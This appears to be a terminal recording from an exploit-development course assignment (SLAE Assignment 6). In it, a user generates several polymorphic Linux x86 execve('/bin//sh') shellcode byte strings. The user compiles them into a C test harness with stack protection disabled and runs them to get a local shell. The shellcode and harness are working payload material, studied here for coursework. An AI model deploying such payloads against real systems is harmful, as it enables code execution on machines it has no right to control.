[17.573217, "o", "AE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m..\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;6H\u001b[?12l\u001b[?25h"]
[17.952288, "o", "/"]
[18.192161, "o", "."]
[18.36813, "o", "."]
[18.624007, "o", "/"]
[19.169966, "o", "b"]
[19.250511, "o", "i"]
[19.457041, "o", "n"]
[19.611783, "o", "\u001b[1m/\u001b(B\u001b[m"]
[20.078828, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SL"]
[20.079118, "o", "AE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin\u001b[1m/\u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;14H\u001b[?12l\u001b[?25h"]
[20.139521, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SL"]
[20.141767, "o", "AE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin\u001b[1m/\u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[9;14H\u001b[?12l\u001b[?25h"]
[20.152617, "o", "\b/c"]
[20.260263, "o", "o"]
[20.423271, "o", "mpile.sh\u001b[1m \u001b(B\u001b[m"]
[20.79112, "o", "\b s"]
[20.863325, "o", "h"]
[21.006454, "o", "ellcode"]
[21.334793, "o", "."]
[21.622747, "o", "c"]
[21.928629, "o", "\r\n\u001b[?2004l"]
[21.936552, "o", "[*] Compiling shellcode"]
[21.936814, "o", "\r\n"]
[21.937023, "o", "[+] Calling gcc without stack protection"]
[21.937179, "o", "\r\n"]
[22.023767, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                \u001b[12;1H \r"]
[22.02517, "o", "\u001b[1;32r\u001b[13;32r\u001b[20S\u001b[12;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b[1;33r\u001b[12;60H\u001b(B\u001b[m"]
[22.025366, "o", "\r\n"]
[22.026235, "o", "\u001b[37m\u001b[1m % \u001b(B\u001b[m"]
[22.026637, "o", "\u001b[K"]
[22.027297, "o", "\u001b[?2004h"]
[22.327439, "o", "."]
[22.950932, "o", "\b./"]
[23.293924, "o", "s"]
[23.397756, "o", "h"]
[23.570552, "o", "ellcode"]
[24.157926, "o", "\r\n\u001b[?2004l"]
[24.169289, "o", "Shellcode Length:  32\r\n$ "]
[25.575545, "o", "e"]
[25.717085, "o", "x"]
[25.828509, "o", "i"]
[26.085067, "o", "t"]
[26.213735, "o", "\r\n\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                \u001b[16;1H \r\u001b[1;32r\u001b[17;32r\u001b[16S\u001b[16;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b[1;33r\u001b[16;60H\u001b(B\u001b[m"]
[26.214227, "o", "\r\n"]
[26.214417, "o", "\u001b[37m\u001b[1m % \u001b(B\u001b[m"]
[26.214748, "o", "\u001b[K"]
[26.215047, "o", "\u001b[?2004h"]
[26.748147, "o", "./shellcode"]
[26.964503, "o", "\u001b[4G../../bin/compile.sh shellcode.c"]
[27.499818, "o", "\u001b[4Gvim\u001b[17P\u001b[12C                 \u001b[17D"]
[28.01965, "o", "\u001b[4G./exec_me.py -m"]
[29.124195, "o", "\r\n\u001b[?2004l"]
[29.223379, "o", "Shellcode:  \\x31\\xd2\\x29\\xc0\\xb0\\xf4\\x2c\\xe9\\xc4\\xe2\\x70\\xf2\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68"]
[29.223782, "o", "\r\n"]
[29.224016, "o", "Length:  31"]
[29.224183, "o", "\r\n"]
[29.226495, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                \u001b[21;1H \r"]
[29.227758, "o", "\u001b[1;32r\u001b[22;32r\u001b[11S\u001b[21;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b[1;33r\u001b[21;60H\u001b(B\u001b[m"]
[29.227943, "o", "\r\n"]
[29.228113, "o", "\u001b[37m\u001b[1m % \u001b(B\u001b[m"]
[29.22829, "o", "\u001b[K"]
[29.228584, "o", "\u001b[?2004h"]
[30.079463, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SL"]
[30.079746, "o", "AE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./shellcode\u001b[K\r\nShellcode Length:  32\u001b[K\r\n$ exit\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x31\\xd2\\x29\\xc0\\xb0\\xf4\\x2c\\xe9\\xc4\\xe2\\x70\\xf2\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b"]
[30.079913, "o", "[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[22;4H\u001b[?12l\u001b[?25h"]
[30.154556, "o", "\u001b[?25l\u001b[H\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[mvim shellcode.c\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SL"]
[30.154854, "o", "AE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m../../bin/compile.sh shellcode.c\u001b[K\r\n[*] Compiling shellcode\u001b[K\r\n[+] Calling gcc without stack protection\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./shellcode\u001b[K\r\nShellcode Length:  32\u001b[K\r\n$ exit\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m./exec_me.py -m\u001b[K\r\nShellcode:  \\x31\\xd2\\x29\\xc0\\xb0\\xf4\\x2c\\xe9\\xc4\\xe2\\x70\\xf2\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[K\r\nLength:  31\u001b[K\r\n\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b(B\u001b[m\u001b[K\r\n\u001b[37m\u001b[1m % \u001b(B\u001b[m\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 zsh \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b"]
[30.155027, "o", "[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[22;4H\u001b[?12l\u001b[?25h"]
[30.282906, "o", "./exec_me.py -m"]
[30.907391, "o", "\r\n\u001b[?2004l"]
[31.012963, "o", "Shellcode:  \\x29\\xc0\\xb0\\x17\\x2c\\xc\\x31\\xc9\\x31\\xd2\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68"]
[31.01329, "o", "\r\n"]
[31.01346, "o", "Length:  27"]
[31.01376, "o", "\r\n"]
[31.015892, "o", "\u001b[1m\u001b[7m%\u001b(B\u001b[m                                                                                                                \u001b[26;1H \r"]
[31.017155, "o", "\u001b[1;32r\u001b[27;32r\u001b[6S\u001b[26;1H\u001b[K\u001b[44mthesp0nge@SLAE\u001b[49m \u001b[32m\u001b[1m/media/sf_SLAE_Course/SLAE/Assignment_6/exec\u001b[1;33r\u001b[26;60H\u001b(B\u001b[m"]
[31.017332, "o", "\r\n"]
[31.01749, "o", "\u001b[37m\u001b[1m % \u001b(B\u001b[m"]
[31.017815, "o", "\u001b[K"]
[31.018212, "o", "\u001b[?2004h"]
[35.975506, "o", "v"]
[36.080502, "o", "\bvi"]
[36.303241, "o", "m"]
[36.36741, "o", " "]
[36.487285, "o", "s"]
[36.583128, "o", "h"]
[36.703072, "o", "ellcode"]
[37.007237, "o", "."]
[37.17474, "o", "c"]
[37.409825, "o", "\r\n\u001b[?2004l"]
[37.482345, "o", "\u001b[?25l\u001b[H\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[4A\u001b[?12l\u001b[?25h"]
[37.492721, "o", "\u001b[1;32r\u001b[2;32r\u001b[31S\u001b[1;1H\u001b[K\u001b]0;SLAE ❐ SLAE ● 1 vim\u0007\u001b[?25l\u001b[1;33r\u001b[33;1H\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m "]
[37.521126, "o", "thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[1;1H\u001b[?12l\u001b[?25h"]
[37.525158, "o", "\u001b[32d\"shellcode.c\"\u001b[?25l"]
[37.526352, "o", " 18L, 372C"]
[37.559079, "o", "\u001b[H\u001b[34m/*\r\n * Put your assembler file here\r\n */\u001b[5;1H\u001b[35m#include\u001b[31m<stdio.h>\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[8;1H\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[9;24H\u001b[31m\"\u001b[35m\\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\rf\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[31m\"\u001b[39m;\u001b[12;1H\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\r\n{\u001b[14;9Hprintf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[15;9H\u001b[32mint"]
[37.559724, "o", "\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[16;9Hret();\r\n}\u001b[20;1H\u001b[94m~                                                                                                                \u001b[21;1H~                                                                                                                \u001b[22;1H~                                                                                                                \u001b[23;1H~                                                                                                                \u001b[24;1H~                                                                                                                \u001b[25;1H~                                                                                                                \u001b[26;1H~                                                                                                                \u001b[27;1H~                                                                                 "]
[37.559879, "o", "                               \u001b[28;1H~                                                                                                                \u001b[29;1H~                                                                                                                \u001b[30;1H~                                                                                                                \u001b[31;1H~                                                                                                                \u001b[32;96H\u001b[39m9,138-152     All\u001b[10;39H\u001b[?12l\u001b[?25h"]
[37.631176, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n                       \u001b[31m\"\u001b[35m\\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[31m\"\u001b[39m;\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n  "]
[37.633698, "o", "      printf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret();\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[94m~                                                                                                                \u001b[21;1H~                                                                                                                \u001b[22;1H~                                                                                                                \u001b[23;1H~                                                                                                                \u001b[24;1H~                                                                                                                \u001b[25;1H~                                                                                                                \u001b[26;1H~                                                                                         "]
[37.63391, "o", "                       \u001b[27;1H~                                                                                                                \u001b[28;1H~                                                                                                                \u001b[29;1H~                                                                                                                \u001b[30;1H~                                                                                                                \u001b[31;1H~                                                                                                                \u001b[32;1H\u001b[39m\"shellcode.c\" 18L, 372C                                                                        9,138-152     All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38"]
[37.634052, "o", ";5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[10;39H\u001b[?12l\u001b[?25h"]
[37.792913, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n                       \u001b[31m\"\u001b[35m\\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[31m\"\u001b[39m;\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n  "]
[37.793206, "o", "      printf(\u001b[31m\"Shellcode Length:  \u001b[35m%d\\n\u001b[31m\"\u001b[39m, strlen(code));\u001b[K\r\n        \u001b[32mint\u001b[39m (*ret)() = (\u001b[32mint\u001b[39m(*)())code;\u001b[K\r\n        ret();\u001b[K\r\n}\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[94m~                                                                                                                \u001b[21;1H~                                                                                                                \u001b[22;1H~                                                                                                                \u001b[23;1H~                                                                                                                \u001b[24;1H~                                                                                                                \u001b[25;1H~                                                                                                                \u001b[26;1H~                                                                                         "]
[37.793352, "o", "                       \u001b[27;1H~                                                                                                                \u001b[28;1H~                                                                                                                \u001b[29;1H~                                                                                                                \u001b[30;1H~                                                                                                                \u001b[31;1H~                                                                                                                \u001b[32;1H\u001b[39m\"shellcode.c\" 18L, 372C                                                                        9,138-152     All\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 1d 1h 57m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 vim \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                                  ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◼\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38"]
[37.793763, "o", ";5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;208m 31% \u001b[38;5;245m| 11:03 | 22 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[10;39H\u001b[?12l\u001b[?25h"]
[37.818298, "o", "\u001b[?25l\u001b[H\u001b[34m/*\u001b[39m\u001b[K\r\n\u001b[34m * Put your assembler file here\u001b[39m\u001b[K\r\n\u001b[34m */\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[35m#include\u001b[31m<stdio.h>\u001b[39m\u001b[K\r\n\u001b[35m#include\u001b[31m<string.h>\u001b[39m\u001b[K\r\n\u001b[K\r\n\u001b[32munsigned\u001b[39m \u001b[32mchar\u001b[39m code[] = \\\u001b[K\r\n                       \u001b[31m\"\u001b[35m\\x29\\xc0\\xb0\\xe\\x2c\\x3\\x6a\\x39\\x5a\\x80\\xea\\x39\\x31\\xc9\\xeb\\x03\\x5b\\xcd\\x80\\xe8\\xf8\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\u001b[31m\"\u001b[39m;\u001b[K\r\n\u001b[K\r\n\u001b[32mint\u001b[39m main(\u001b[32mint\u001b[39m argc, \u001b[32mchar\u001b[39m **argv)\u001b[K\r\n{\u001b[K\r\n  "]
